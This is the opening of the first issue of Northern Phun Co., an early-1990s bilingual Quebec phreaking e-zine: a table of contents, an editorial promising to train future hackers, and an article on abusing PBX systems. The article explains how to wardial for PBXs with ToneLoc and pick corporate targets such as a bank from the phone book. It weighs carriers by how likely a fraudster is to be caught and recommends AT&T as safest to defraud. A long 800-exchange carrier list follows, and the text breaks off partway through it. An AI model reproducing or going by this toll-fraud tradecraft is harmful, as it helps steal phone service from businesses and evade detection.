��������������������       �����������������������    �����������������������
            ����������                  ����������                 ����������
����������� �����������    ������������ ����������    ������������
����������� �����������    ����������������������     ������������
����������� �����������    ��������������������       ������������
����������� �����������    ������������                ����������������������
����������� �����������    ������������                 ���������������������
                           ������������
                           ������������

     ������������������������������������������������������������������͸
     �  N � O � R � T � H � E � R � N     P � H � U � N      C � O � .  �
     ��������������������������������������������������������������������


Dans ce premier num�ro de NPC:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
�����������������������������������������������������������ͻ
�SUJET                              �AUTEUR                 �
�����������������������������������������������������������Ķ
�Table des mati�res                 �-=ThE PoSSe=-          �
�Introduction � NPC                 �Blitzkrieg             �
�Ces fameux PBXs...                 �Atreid Bevatron        �
�Anthologie de la 'lamerosit�'      �Mental Floss           �
�Pro-Phile de Yakoul                �Blitzkrieg             �
�Smokin' banana's plems             �Coaxial Karma          �
�Trashing, Bell Canada Style        �Blitzkrieg             �
�Crossin' change machines           �Coaxial Karma          �
�Beginning hacking VAX/VMS          �The Subhuman Punisher  �
�Crossin' change machines II        �Coaxial Karma          �
�Virus NPC-011                      �Blitzkrieg/Nancy Reagan�
�Conclusion                         �THX 1138               �
�����������������������������������������������������������ͼ

Staff  : �Atreid Bevatron             Contributors : �Nancy Reagan
        �Blitzkrieg                                 �THX 1138
        �Coaxial Karma
        �Mental Floss
        �The Subhuman Punisher


Comment nous rejoindre �:
~~~~~~~~~~~~~~~~~~~~~~~~~

Call Medic BBS at 418-682-8128 ...leave message to user "Northern Phun Co".

Note:    For your discretion sake, the sysop has provided us (and you) with a
        Guest account to leave messages to NPC. The UserName is "GUEST" and the
        password is "GUEST" too... on that account, you can do nothing but
        leave private message to NPC with the "&" function at the main menu.

        Racontez-nous n'importe quoi qui vous passe par la t�te... Des
        suggestions de chroniques dans NPC, des commentaires, des comptes-�-
        rendre avec des membres de NPC, votre Curriculum si vous voulez faire
        application � NPC ou un texte pour notre futur forum des lecteurs. Vous
        pouvez tout aussi bien nous contacter personnellement pour toutes
        questions techniques relatives � l'underground, la plupart des "membres"
        de NPC sont sur les bbs 'pirates' de Qu�bec Beach!

        Et en terminant, il n'y a pas de r�seau de distribution proprement dit
        de NPC, m'enfin, il devra �tre disponible dans une section <NO-RATIO>
        dans la plupart des boards ShareWare/UndErGr0unD.



Greets :   M�dic's Sysop, Pixture God, Psychedelic Madness (for providing us
~~~~~~~~   with hours of laughing)


Dans NPC #2 :
~~~~~~~~~~~~~


-Complete UNiX hacking
-Injector pour virii
-Getting Cartes D'appels
-VAX/VMS hacking part two
-And many more interesting stuff...



     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����



                            NORTHERN PHUN CO.
                            --=IT'S ALIVE!=--

                                �DITORIAL
                                   PAR
                               BLITZKREIG



    Ouais! This bitch is getting off the ground! And it's gonna
ride high! Northern Phun Co. est venu au monde, pour vous servir,
m'sieurs dames! Qui est NPC? Les collaborateurs de cette revue
se sont rencontr�s ici et l�, au d�tour d'une boite t�l�phonique
ou d'un bac � ordures du Bell. Le plaisir du phreak est �galement
partag� par ces complices, mais nos horizons ne se limitent pas
l�. Que veut NPC? Aider � former les hackers de demain, mettre
le Qu�bec sur la carte des repaires de cyberpunks qualifi�s,
permettre aux groupes jusqu'ici isol�s de se retrouver, bref,
contribuer � l'�closion et � l'avancement d'une sc�ne underground
au Qu�bec QUI NE DEVRA RIEN aux Amerloques, aux Allemands, ou �
tout autre groupe qui revendique le statut de Nation Des Hackers.
Et on va le faire en anglais et en FRANCAIS, parce que le
bilinguisme est � notre image. L'usage du francais dans un mag
underground ne nous donne pas de complexes, loin de l�! Hack-Tik
(Pays-Bas) est en n�erlandais, C.C.C. (Chaos Computer Club)
publie sa bible en allemand. Northern Phun Co. a vu le jour de
ce c�t�-ci du Rio Grande, l� o� la langue de Moli�re (et du
marquis de SADE!) fleurit encore. C'est pas parce qu'on est
voisin de l'Imp�rial USA qu'on est oblig�s de cr�cher � la m�me
enseigne. On va faire mieux, on va innover, on va diffuser nos
ragots et nos histoires � dormir debout DANS LES DEUX LANGUES!
And why not? Si vous �tes pas fiers de votre langue natale, c'est
que vous �tes n�s du mauvais c�t� de la fronti�re, les mecs!
Cardez-vous un d�m�nagement chez les bloques, et crissez-nous la
paix! Northern Phun Co. n'est pas n� pour un petit pain, NPC ne
d�sire pas passer pour ce qu'il n'est pas, et si ca prend une job
de bras pour expliquer � notre public qu'il n'est �crit NULLE
PART que l'underground se passe obligatoirement en anglais, eh
bien soit! On va en faire la d�monstration, num�ro apr�s num�ro.
Car ce�i ne sera pas l'affaire d'un soir, un accident de
parcours, un coup de chance, ou tout autre d�finition lame que
trouveront nos d�tracteurs. Faites rentrer les femmes dans la
maison, cachez vos enfants dans le placard � balais, cadenassez
votre porte, braves gens, NPC est l� pour y rester!

    Autre quiproquo que nous d�sirons �viter: NPC et les
lamers... Vous avez tous votre propre petite d�finition de ce
qu'est un lamer. Mieux encore: vous �tes g�n�ralement persuad�s
que votre voisin en est un! Un mec vous laisse un message sur un
bab pour vous demander ce qu'est un PBX et paf! vous croyez avoir
d�couvert un autre lamer! Erreur, mon cher Watson! Ce que tu
viens de rencontrer, c'est un mec qui, avec un minimum de
formation et d'encouragement pourra peut-�tre devenir un pirate
formidable! NPC publiera des articles pour les novices d�sireux
d'apprendre, que ce soit � propos des viriis ou du carding, parce
qu'il est tout simplement LOGIQUE d'apprendre � marcher avant
d'apprendre � courir... Ceux qui l�vent le nez sur les d�butants
et refusent de les coacher sont parfois ceux-l� m�me qui ont d�
�tre aid�s � leurs d�buts, et qui ne sont pas capables de
retourner � la communaut� ce qu'ils y ont pris... C'est la
d�finition par excellence du lamer typique, nous semble-t'=l...

    L'union fait la force, nous esp�rons que vous en �tes
convaincus. NPC d�sire contribuer au rapprochement de tous les
cowboys du futur qui trainent ici et l�, parce que lorsque
l'exp�rience et la connaissance se partagent, les gains de la
multitude connaissent des bonds prodigieux...

NPC enfin, because we only care about the best... and we hope you
will too...



PHUN! PHUN! PHUN! IN THE CYBERSPACE!


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����


                     �������������������������ͻ
                     � Private Branch eXchange �
                     �         -=PBX=-         �
                     �������������������������ͼ

                                 PAR

                           AtrEiD BeVaTRoN


    � Est-ce que tu scannes pour les PBX ? �  Voil� une putain de
question que l'on peut lire de deux � trois fois par semaine sur tous
les bab pirates de Qu�bec...  C'est bien beau de scanner pour les PBX,
mais bordel... J'ai facilement remarqu� une tendance plus que d�cevante
en ce domaine : l'ignorance...  Pourquoi?  Parce qu'on a beau �tre des
suppos�s experts en t�l�communications, c'est pas en parlant de HOCKEY
ou de CONSTITUTION sur les bbs que la sc�ne d'ici se d�veloppera.
Quelques initi�s, comme la bande de NPC et moi-m�me, se sont malheureu-
sement vus confront�s � eux-m�mes d�s leurs d�buts, ce qui sans aucun
doute a eu un effet n�faste sur la rapidit� d'apprentissage, puisque
nous devions r�apprendre ce qui �tait d�j� connu.  Moi, je dis que c'est
dommage de devoir r�inventer la roue � chaque fois...  Enfin... Je vais
en venir au fait, qui est dans ce cas les PBX...

    PBX = Private Branch eXchange,  pour ceux qui ne le savent pas ou
pour ceux qui croyaient le savoir.  C'est la seule et unique d�finition
qui existe.  Un PBX est un syst�me de lignes t�l�phoniques qui relie en
r�seau diff�rents paliers informatiques et humains.  Les PBX sont
utilis�s dans certaines compagnies qui n�cessitent des connections
fr�quentes et des transferts d'informations importants entre les divers
agents de production.  Ils assurent ainsi une communication simple et
accrue entre tous les usagers.  On peut comparer les PBX � un syst�me
informatique ou m�me � un bbs du fait que chaque usager (employ�)
poss�de son propre code de s�curit� lui permettant d'acc�der au r�seau.
C'est � ces fameux codes que nous nous interresserons.




         ���������
         � Structure des PBX

    Les PBX peuvent �tre repr�sent�s par un syst�me de branches, toutes
reli�es au cerveau du syst�me, soit le PBX SYSTEM.  Voici un exemple
d'un syst�me de PBX typique.

       ������������������������ͻ
       �Ligne(s) t�l�phonique(s)�               �����������ͻ
       �      d'entr�e          �               �Secr�tariat�
       ������������������������ͼ               �����������ͼ
            ������������������Ŀ                ���
 �������ͻ                     �                �
 �Postes �                     �                �
 �  de   ��Ŀ            ����������������ͻ     �   ����������ͻ
 �Travail�  ��������Ŀ   �IN      �    IN �������   � Bureaux  �
 �������ͼ           ���Ķ    ������ͻ  & �         �Principaux�
                         ��Ŀ � PBX  � OUT�         ����������ͼ
                         �  �ĶSYSTEM�Ŀ  ������������
                         �    ������ͼ �  �     �����������ͻ
                         �      OUT    ��Ķ     �Syst�me de �
                         ����������������ͼ     �traitement �
                         �����       �  ��      �de messages�
             �������������           ��  ��Ŀ   �����������ͼ
        ������������������������ͻ    �Ŀ   �������
        �Ligne(s) t�l�phonique(s)�    ���������������ͻ
        �     vers la sortie     �    �Base de donn�es�
        ������������������������ͼ    �� utiliser par �
                                      �modem          �
                                      ���������������ͼ

    Ce qui est reli� au IN est ce qui ne peut �tre utilis� que pour
aller VERS le syst�me de PBX. On ne peut PAS utiliser toute autre partie
du syst�me pour rejoindre cette partie.
Exemple : On ne peut PAS utiliser un poste de travail pour faire un
         appel en utilisant la ligne d'entr�e.

    Ce qui est reli� au OUT est ce qui peut �tre atteint par les IN. On
ne peut PAS utiliser un OUT pour rejoindre un IN.
Exemple : On ne peut PAS rejoindre le syst�me du PBX en composant le
         num�ro correspondant � la ligne t�l�phonique de sortie.

    Ce qui est reli� au IN & OUT est ce qui peut �tre rejoint par les
IN -=ET=- ce qui peut rejoindre les OUT.
Exemple : Le secr�tariat DOIT pouvoir �tre rejoint par les lignes
         t�l�phoniques d'entr�e tout en conservant le droit
         d'effectuer des appels sur la ligne de sortie.

    Cette structure n'est �videmment que la structure g�n�rale des PBX
et elle peut varier de syst�me en syst�me.  La compr�hension de cette
structure de base est capitale avant toute tentative de scan ou de hack
d'un syst�me de PBX.




         ���������
         � D�tecter un PBX

    Je n'ai trouv� qu'une seule et unique fa�on de chercher tous les
PBX qui n'attendent que d'�tre hack�s : TONELOC...  Ceux qui ont la
malchance de ne pas l'avoir en leur possession, informez-vous, ce n'est
g�n�ralement pas difficile � trouver. Toneloc est le meilleur programme
de scan.  Qu'est-ce que le scan?  C'est simplement l'action de composer
automatiquement des num�ros de t�l�phone, et ce sans interruption, dans
le but que votre modem d�tecte un son particulier comme la voix, un tone
r�gulier, un modem, un Busy...  ToneLoc vous fera un compte-rendu de sa
s�ance de scan en vous informant de ce qui s'est produit apr�s avoir
compos� chaque num�ro.

    Les PBX se caract�risent par le fait que lorsqu'on appelle sur la
ligne d'entr�e de ce dernier, on obtient un tone r�gulier, normalement
semblable � celui qu'on peut entendre lorsqu'on d�croche notre propre
t�l�phone.  Puisque la fonction principale de Toneloc est de d�tecter
des tones OU des modems (jamais les deux en m�me temps malheureusement),
Toneloc d�tectera donc les PBX qui s'annoncent par un tone, ce qui est
le plus fr�quent.




         ���������
         � O� chercher pour les PBX

    On peut dire qu'il existe deux grandes cat�gories de PBX. Les 800
et les LOCAUX. Voici dans les grandes lignes  leurs caract�ristiques:

    Les LOCAUX : Pour les d�couvrir et pour les abuser, il vaut mieux
poss�der une certaine habilet� et quelques contacts. En effet, les
locaux ne sont pas extr�mement fr�quents et les quelques fois que j'en
ai trouv�, ils �taient tout simplement Pas-Hackables...  Le seul atout
majeur sur lequel on peut compter est que Qu�bec n'a pas connu sa grosse
dose de Phreaking, ce qui a occasionn� une totale ignorance de Bell sur
ce dont les phreakers sont capables.  L'unique avantage de cette
infirmit� c'est qu'on peut ESP�RER que certains �quipements l�g�rement
plus vieux soient trouv�s, du genre de ceux qui ne poss�dent pas de code
(ce qui veux dire qu'on peut passer directement � la ligne de sortie et
faire ses appels!).  Un bon outil pour savoir o� chercher est le bon
vieil annuaire t�l�phonique du Bell.  En effet, quand on y pense, on
peut d�ja supposer que, et ce n'est qu'un exemple, les bureaux
principaux de la Banque Royale poss�dent un syst�me de PBX, �tant donn�
l'importance de la communication dans une banque et de l'�tendue du
pouvoir de celle-ci.  Donc, pour trouver o� scanner, on n'a qu'� ouvrir
l'anuaire, trouver le num�ro pour rejoindre les bureaux de la Banque
Royale et remarquer les trois premiers chiffres.  Disons que le num�ro
du secr�tariat est le 543-3456, on peut d�j� supposer que la ligne
d'entr�e ext�rieure se trouvera dans 543-XXXX. Il arrivera
malheureusement que quelques fois, les responsables de la s�curit�
seront plus malins et n'assigneront pas les m�mes chiffres, mais j'ai
remarqu� que cela est plut�t rare puisqu'il est aussi tr�s rare qu'un
responsable de la s�curit� soit malin, situation un peu paradoxale...

    Les 800 : Ils sont ce que je peux d�finir comme �tant ma
sp�cialit�.  Du fait qu'ils peuvent se trouver n'importe o� au Canada ou
au �tats-Unis, les syst�mes et leur qualit� varient consid�rablement.
C'est d'ailleurs ce qui fait leur faiblesse. La distance en ce monde est
depuis toujours une barri�re aux ententes et un agent d'activation � la
papperasserie. De fa�on g�n�rale, plus l'�loignement entre l'abuseur et
le PBX est grand, plus la paperrasse s'amoncelle, et plus elle bloque
les recours en justice et... LES GROS BILLS!!!  Mais le sentier menant
aux PBX 800 est assez accident� et ce n'est qu'avec les bons outils que
l'on peut arriver � escalader la montagne et apprivoiser le dragon qui
nous fera voler � travers le r�seau t�l�phonique mondial...  Au Canada,
c'est tr�s simple, il y a Bell Canada, point � la ligne! (Bient�t
UNITEL!!!!)  Par contre aux Usa, le march� est tr�s divis�. Je ne
m'attarderai que sur quatre compagnies : AT&T, Sprint et MCI, Telcom
Canada.
         AT&T : LA grande compagnie aux usa. Je ne cacherai pas que je
         scanne UNIQUEMENT dans les num�ros 800 appartenant � AT&T.
         C'est la compagnie la plus ag�e, ce qui ne fait pas d'elle la
         plus exp�riment�e et c'est aussi celle qui a le plus �tendu
         son territoire � travers les Usa.  Je dirais que c'est la
         seule compagnie que l'on peut encore esp�rer frauder "sans se
         faire pogner!"

         Sprint & MCI : Ils poss�dent sans conteste les r�seaux de PBX
         les plus perfectionn�s en Am�rique du Nord et m�me au
         monde.  La ligne est presque toujours d'une qualit� impeccable
         et leur organisation est tr�s sophistiqu�e. La communication
         entre les agents de s�curit� de ces deux compagnies est
         optimale, ce qui permet une v�rification constante et simple
         des fraudes par les op�rateurs du PBX.  Ces compagnies
         poss�dent aussi une caract�ristique tr�s particuli�re. Le
         syst�me ANI (Automatic Number Identification) permet aux
         op�rateurs et � la compagnie de t�l�phone de savoir d'o�
         provient l'appel � la seconde o� il est fait.  Les syst�mes de
         PBX de ces deux compagnies sont faits de telle fa�on qu'ils
         compilent un fichier qui rassemble la liste des num�ros de
         t�l�phones correspondants � TOUS les appels faits au syst�me
         de PBX.  Le fait que AT&T soit "plus safe" r�side dans le
         ph�nom�ne que le syst�me ANI n'est pas fourni (sauf sur
         demande sp�ciale, faite rarement) aux op�rateurs de PBX. En
         termes g�n�raux et simples : MCI & Sprint = SUICIDE!!!!!!

         Telcom Canada : La distance et la paperrasse.  Ces deux
         facteurs sont beaucoup moins �lev�s, donc les chances de "se
         faire pogner" sont plus �lev�es.  Le fait de r�sider dans le
         m�me pays est aussi un facteur TR�S d�terminant sur celui du
         risque. De plus, les caract�ristiques de cette compagnie, qui
         est en fait Bell Canada, sont plut�t m�connues et les risques
         que prend l'abuseur du syst�me en question sont inconnus, ou
         presque. Pour cette raison, et pour la raison logique que la
         distance est proportionnelle � la paperasse: je choisis AT&T.
         Je dirai simplement que je n'ai pas envie d'explorer des
         territoires inconnus � mes d�pens lorsque les territoires
         connus sont d�j� tr�s acceptables, et que le gibier y abonde
         encore...


Mais comment savoir dans quelle compagnie se situe un certain exchange
800 ?  Assez simple: en consultant la liste suivante.

-------
202  RADIO COMMON CARRIER PAGING
212  RADIO COMMON CARRIER PAGING
213  CINCINNATI BELL TELEPHONE
220  ATX-COMMUNICATIONS
221  AT&T-C
222  AT&T-C
223  AT&T-C
224  LONG DISTANCE FOR LESS
225  AT&T-C
226  ATC
227  AT&T-C
228  AT&T-C
229  CABLE & WIRELESS COMMUNICATIONS
230  NETWORK TELEMANAGEMENT SERVICES
231  AT&T-C
232  AT&T-C
233  AT&T-C
234  MCI TELECOMMUNICATIONS CORPORATION
235  AT&T-C
236  SCHNEIDER COMMUNICATIONS
237  AT&T-C
238  AT&T-C
239  DELTA COMMUNICATIONS, INC.
240  SOUTHERN INTEREXCHANGE SERVICES
241  AT&T-C
242  AT&T-C
243  AT&T-C
244  800 NUMBER SERVICE & ASSIGNMENT CENTER
245  AT&T-C
246  SOUTHWESTERN BELL
247  AT&T-C
248  AT&T-C
249  LASSMAN-WEBER COMMUNICATIONS
251  AT&T-C
252  AT&T-C
253  AT&T-C
254  TOTAL-TEL USA
255  AT&T-C
256  LONG DISTANCE SAVERS
257  AT&T-C
258  AT&T-C
259  LONG DISTANCE SAVERS
260  COM-LINK21
261  SCHNEIDER COMMUNICATIONS
262  AT&T-C
263  TELCOM CANADA
264  LDDS COMMUNICATIONS
265  TELCOM CANADA
266  COM SYSTEMS
267  TELCOM CANADA
268  TELCOM CANADA
269  FIRST DIGITAL NETWORK
270  CLEARTEL COMMUNICATIONS
271  TRAFFIC ROUTING ADMINISTRATION 3
272  AT&T-C
273  800 NUMBER SERVICE & ASSIGNMENT CENTER
274  MCI TELECOMMUNICATIONS CORPORATION
275  MTD/UNITED STATES TRANSMISSION SYSTEMS
276  ONE CALL COMMUNICATIONS, INC.
277  MCI / TDD / SOUTHERNNET, INC.
279  MIDAMERICAN
280  ADVANTAGE NETWORK, INC.
282  AT&T-C
283  MCI TELECOMMUNICATIONS CORPORATION
284  MCI TELECOMMUNICATIONS CORPORATION
286  SOUTHERN NEW ENGLAND TELEPHONE
287  800 NUMBER SERVICE & ASSIGNMENT CENTER
288  MCI TELECOMMUNICATIONS CORPORATION
289  MCI TELECOMMUNICATIONS CORPORATION
292  AT&T-C
293  PROTO-COL
294  AFFORD A CALL
295  ACC LONG DISTANCE CORPORATION
296  LONG DISTANCE SERVICE, INC.
297  AMERICAN EXPRESS TRS
298  COMTEL OF NEW ORLEANS
299  ATC
302  RADIO COMMON CARRIER PAGING
312  RADIO COMMON CARRIER PAGING
320  CONQUEST LONG DISTANCE CORPORATION
321  AT&T-C
322  AT&T-C
323  AT&T-C
324  HOUSTON NETWORKM INC./VXVY TELECOM, INC.
325  AT&T-C
326  US TELCOM, INC./US SPRINT
327  AT&T-C
328  AT&T-C
329  ATC
330  ATC
331  AT&T-C
332  AT&T-C
333  MCI TELECOMMUNICATIONS CORPORATION
334  AT&T-C
335  SCHNEIDER COMMUNICATIONS
336  AT&T-C
337  FIRST DATA RESOURCES
338  AT&T-C
339  800 NUMBER SERVICE & ASSIGNMENT CENTER
340  FIRST FINANCIAL MANAGEMENT CORPORATION
341  AT&T-C
342  AT&T-C
343  AT&T-C
344  AT&T-C
345  AT&T-C
346  AT&T-C
347  US TELCOM, INC./US SPRINT
348  AT&T-C
349  DIRECT COMMUNICATIONS, INC.
350  COM SYSTEMS
351  AT&T-C
352  AT&T-C
353  SCHNEIDER COMMUNICATIONS
354  AT&T-C
355  ATX-COMMUNICATIONS
356  AT&T-C
357  CAM-NET SYSTEMS-INC.
358  AT&T-C
359  US TELCOM, INC./US SPRINT
360  ?
361  TELCOM CANADA
362  AT&T-C
363  TELCOM CANADA
364  HOUSTON NETWORKM INC./VXVY TELECOM, INC.
365  MCI TELECOMMUNICATIONS CORPORATION
366  US TELCOM, INC./US SPRINT
367  AT&T-C
368  AT&T-C
369  MCI / TELECONNECT
370  MCI / TELECONNECT
372  AT&T-C
373  MCI / TELECONNECT
374  INTERNATIONAL TELECHARGE, INC.
375  ATC CIGNAL COMMUNICATIONS
375  ATC
376  ECONO-CALL LONG DISTANCE
377  TELENET COMMUNICATIONS CORPORATION
378  NATIONAL TELEPHONE COMPANY
379  EASTERN MICROWAVE
381  LONG DISTANCE OF MICHIGAN
382  AT&T-C
383  MCI / TELECONNECT
384  FRIEND TECHNOLOGIES
385  HEDGES COMMUNICATIONS /COM CABLE LAYING
386  TELECABLE CORPORATION
387  TELCOM CANADA
388  MCI TELECOMMUNICATIONS CORPORATION
390  ECONO-CALL
392  AT&T-C
393  PIONEER TELEPHONE /EXECULINES OF FLORIDA
394  CABLE & WIRELESS COMMUNICATIONS
395  MCI TELECOMMUNICATIONS CORPORATION
396  BANK OF AMERICA
397  MCI / TELECONNECT
399  AMERICALL CORPORATION (CA)
402  RADIO COMMON CARRIER PAGING
412  RADIO COMMON CARRIER PAGING
420  TMC OF SOUTHWEST FLORIDA
421  AT&T-C
422  AT&T-C
423  AT&T-C
424  AT&T-C
425  TELE TECH, INC.
426  AT&T-C
427  800 NUMBER SERVICE & ASSIGNMENT CENTER
428  AT&T-C
429  T-TEL
431  AT&T-C
432  AT&T-C
433  AT&T-C
434  AMERIGON
435  AT&T-C
436  INDIANA SWITCH, INC.
437  AT&T-C
438  AT&T-C
439  800 NUMBER SERVICE & ASSIGNMENT CENTER
440  TEX-NET
441  AT&T-C
442  AT&T-C
443  AT&T-C
444  MCI TELECOMMUNICATIONS CORPORATION
445  AT&T-C
446  AT&T-C
447  AT&T-C
448  AT&T-C
449  UNITED TELCO / TELAMAR
450  US LINK LONG DISTANCE
451  AT&T-C
452  AT&T-C
453  AT&T-C
454  ALLNET COMMUNICATIONS SERVICES
455  LDD, INC.
456  MCI TELECOMMUNICATIONS CORPORATION
457  AT&T-C
458  AT&T-C
459  NORTHWEST BELL
460  NATIONAL TELEPHONE EXCHANGE
461  TELCOM CANADA
462  AT&T-C
463  TELCOM CANADA
464  800 NUMBER SERVICE & ASSIGNMENT CENTER
465  TELCOM CANADA
466  ALLNET COMMUNICATIONS SERVICES
467  LDDS COMMUNICATIONS
468  AT&T-C
469  IOWA NETWORK SERVICES
471  ALLNET COMMUNICATIONS SERVICES
472  AT&T-C
473  US TELCOM, INC./US SPRINT
474  VIRGIN ISLAND TELEPHONE
475  MCI / TELECONNECT
476  MCI / TDD / SOUTHERNNET, INC.
477  MCI TELECOMMUNICATIONS CORPORATION
478  ALASCOM
479  800 NUMBER SERVICE & ASSIGNMENT CENTER
481  GTE/NORTH
482  AT&T-C
483  GTE/FLORIDA
484  MCI / TELECONNECT
485  MCI / TELECONNECT
486  CABLE & WIRELESS COMMUNICATIONS
487  US TELCOM, INC./US SPRINT
488  US TELCOM, INC./US SPRINT
489  LDDS COMMUNICATIONS
492  AT&T-C
493  INTERNATION PACIFIC
494  NETWORK TELEPHONE SERVICE
495  J-NET COMMUNICATIONS
496  TRAFFIC ROUTING ADMINISTRATION 3
502  RADIO COMMON CARRIER PAGING
512  RADIO COMMON CARRIER PAGING
520  PENTAGON COMPUTER DATA, LTD.
521  AT&T-C
522  AT&T-C
523  AT&T-C
524  AT&T-C
525  AT&T-C
526  AT&T-C
527  AT&T-C
528  AT&T-C
529  MIDCO COMMUNICATIONS
530  VARTEC NATIONAL, INC.
531  AT&T-C
532  AT&T-C
533  AT&T-C
534  TRAFFIC ROUTING ADMINISTRATION 3
535  AT&T-C
536  ALLNET COMMUNICATIONS SERVICES
537  AT&T-C
538  AT&T-C
539  FIRST PHONE
540  800 NUMBER SERVICE & ASSIGNMENT CENTER
541  AT&T-C
542  AT&T-C
543  AT&T-C
544  AT&T-C
545  AT&T-C
546  US TELCOM, INC./US SPRINT
547  AT&T-C
548  AT&T-C
549  CALL AMERICA
550  CALL-AMERICA
551  AT&T-C
552  AT&T-C
553  AT&T-C
554  AT&T-C
555  AT&T-C
556  AT&T-C
557  ALLNET COMMUNICATIONS SERVICES
558  AT&T-C
561  TELCOM CANADA
562  AT&T-C
563  TELCOM CANADA
564  800 NUMBER SERVICE & ASSIGNMENT CENTER
565  TELCOM CANADA
566  ALLNET COMMUNICATIONS SERVICES
567  TELCOM CANADA
568  MCI TELECOMMUNICATIONS CORPORATION
569  TELESPHERE NETWORK
572  AT&T-C
574  ACCESS LONG DISTANCE
575  UNITED COMMUNICATIONS, INC.
577  TELENET COMMUNICATIONS CORPORATION
579  LINTEL SYSTEMS
580  WESTEL
582  AT&T-C
583  MCI / TELECONNECT
584  MCI / TELECONNECT
586  ACTION TELECOM COMPANY
587  LONG DISTANCE FOR LESS
588  ACTION TELECOM COMPANY
589  LITEL
592  AT&T-C
593  MCI / TELECONNECT
594  MCI / TELECONNECT
595  PUERTO RICO TELEPHONE
596  TELECOM "OPTIONS" PLUS, INC.
599  LONG DISTANCE MANAGEMENT
602  RADIO COMMON CARRIER PAGING
612  RADIO COMMON CARRIER PAGING
621  AT&T-C
622  AT&T-C
623  TRAFFIC ROUTING ADMINISTRATION 3
624  AT&T-C
625  NATIONAL DATA CORP
626  AT&T-C
627  MCI TELECOMMUNICATIONS CORPORATION
628  AT&T-C
629  BEEHIVE TELEPHONE
631  AT&T-C
632  AT&T-C
633  AT&T-C
634  AT&T-C
635  AT&T-C
636  CONQUEST COMMUNICATION CORPORATION
637  AT&T-C
638  AT&T-C
639  BURLINGTON TEL
640  800 NUMBER SERVICE & ASSIGNMENT CENTER
641  AT&T-C
642  AT&T-C
643  AT&T-C
644  CALL-AMERICA
645  AT&T-C
646  UNION TELEPHONE COMPANY
647  AT&T-C
648  AT&T-C
649  800 NUMBER SERVICE & ASSIGNMENT CENTER
652  AT&T-C
654  AT&T-C
655  EXECULINE OF SACRAMENTO, INC.
656  AMVOX
657  MCI / TELECONNECT
658  MCI / TELECONNECT
659  US TELCOM, INC./US SPRINT
660  800 NUMBER SERVICE & ASSIGNMENT CENTER
661  TELCOM CANADA
662  AT&T-C
663  TELCOM CANADA
664  MCI TELECOMMUNICATIONS CORPORATION
665  TELCOM CANADA
666  MCI TELECOMMUNICATIONS CORPORATION
667  TELCOM CANADA
668  TELCOM CANADA
669  US TELCOM, INC./US SPRINT
672  AT&T-C
673  MCI / TDD / SOUTHERNNET, INC.
674  MCI / TELECONNECT
675  800 NUMBER SERVICE & ASSIGNMENT CENTER
676  US TELCOM, INC./US SPRINT
677  MCI TELECOMMUNICATIONS CORPORATION
678  MCI TELECOMMUNICATIONS CORPORATION
679  TRANS-NET, INC.
680  PACIFIC TELCOM
682  AT&T-C
683  METROMEDIA LONG DISTANCE
684  NORTHERN TELECOM, INC.
685  MCI TELECOMMUNICATIONS CORPORATION
686  LITEL
687  NTS COMMUNICATIONS
688  MCI TELECOMMUNICATIONS CORPORATION
689  NORTHWEST TELCO
691  DOMIN REPUBLIC TELEPHONE
692  AT&T-C
693  TRI-J
694  TELESCAN
695  MCI TELECOMMUNICATIONS CORPORATION
696  800 NUMBER SERVICE & ASSIGNMENT CENTER
698  800 NUMBER SERVICE & ASSIGNMENT CENTER
699  PILGRIM TELEPHONE CO.
702  RADIO COMMON CARRIER PAGING
712  RADIO COMMON CARRIER PAGING
720  TELEMANAGEMENT CONSULT'T CORP
721  FLEX COMMUNICATIONS
722  AT&T-C
723  MCI TELECOMMUNICATIONS CORPORATION
724  RCI CORPORATION
725  ATC
726  US TELCOM, INC./US SPRINT
727  MCI TELECOMMUNICATIONS CORPORATION
728  MCI / TELECONNECT
729  US TELCOM, INC./US SPRINT
732  AT&T-C
733  US TELCOM, INC./US SPRINT
734  800 NUMBER SERVICE & ASSIGNMENT CENTER
735  US TELCOM, INC./US SPRINT
736  US TELCOM, INC./US SPRINT
737  MERCURY, INC.
738  MERCURY, INC.
741  ATC
742  AT&T-C
743  US TELCOM, INC./US SPRINT
744  TRAFFIC ROUTING ADMINISTRATION 3
745  US TELCOM, INC./US SPRINT
746  FTC COMMUNICATIONS, INCORPORATION
747  MCI / TELECONNECT
748  MCI / TELECONNECT
749  ATC
752  AT&T-C
753  MCI TELECOMMUNICATIONS CORPORATION
754  TEL-SHARE
755  US TELCOM, INC./US SPRINT
756  MCI TELECOMMUNICATIONS CORPORATION
757  TMC OF SOUTH CENTRAL INDIANA
759  MCI TELECOMMUNICATIONS CORPORATION
761  ALTERNATE COMMUNICATIONS TECHNOLOGY
762  AT&T-C
763  TOUCH & SAVE
764  ALASCOM
765  MCI TELECOMMUNICATIONS CORPORATION
766  MCI TELECOMMUNICATIONS CORPORATION
767  US TELCOM, INC./US SPRINT
768  MCI / TDD / SOUTHERNNET, INC.
770  GENERAL COMMUNICATIONS
771  MCI / TDD / SOUTHERNNET, INC.
772  AT&T-C
773  COMPU-TEL INC.
774  TTE OF CHARLESTON
776  US TELCOM, INC./US SPRINT
777  MCI TELECOMMUNICATIONS CORPORATION
778  ELECTRONIC DATA SYSTEMS CORPORATION
779  MCI / TELECONNECT
780  MCI / TDD / SOUTHERNNET, INC.
782  AT&T-C
783  ALLNET COMMUNICATIONS SERVICES
784  AMERICAN LONG LINE
785  SUNSHINE TELEPHONE CO.
786  UNITED/FLORIDA
787  MID ATLANTIC TELECOM
788  US TELCOM, INC./US SPRINT
789  TEL-AMERICA, INC.
792  AT&T-C
794  800 NUMBER SERVICE & ASSIGNMENT CENTER
797  TMC OF SOUTH CENTRAL INDIANA
798  MCI / TELECONNECT
800  US TELCOM, INC./US SPRINT
802  RADIO COMMON CARRIER PAGING
807  NETWORK TELECOMMUNICATIONS
808  AMERITECH AUDIOTEX SERVICES
812  RADIO COMMON CARRIER PAGING
821  AT&T-C
822  AT&T-C
823  TOUCH AMERICA
824  AT&T-C
